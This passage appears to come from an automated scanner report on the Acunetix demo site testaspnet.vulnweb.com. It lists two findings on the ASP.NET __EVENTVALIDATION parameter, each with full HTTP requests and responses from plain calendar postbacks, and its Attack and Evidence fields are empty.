style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8521&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAzAHXSdsIZGRkjwB%2BjnyhlgEcdqR%2B7H1UlrTV4UA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLe6MHnDgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA16DHwJKs6n9pFDW07DbPodkDBh%2F
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:35 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAzAHXSdsIZGRkjwB+jnyhlgEcdqR+7H1UlrTV4UA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLe6MHnDgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA16DHwJKs6n9pFDW07DbPodkDBh/" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:White" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8267&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA3%2Bw%2BgtoIZGRkbUXgxC6numsOETD%2BWeRFxxd77po%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLe8Z2kDAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DS62oO1HDJCvsYYFTGh0gwIxby%2BM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:21 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA3+w+gtoIZGRkbUXgxC6numsOETD+WeRFxxd77po=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLe8Z2kDAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DS62oO1HDJCvsYYFTGh0gwIxby+M=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:White" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 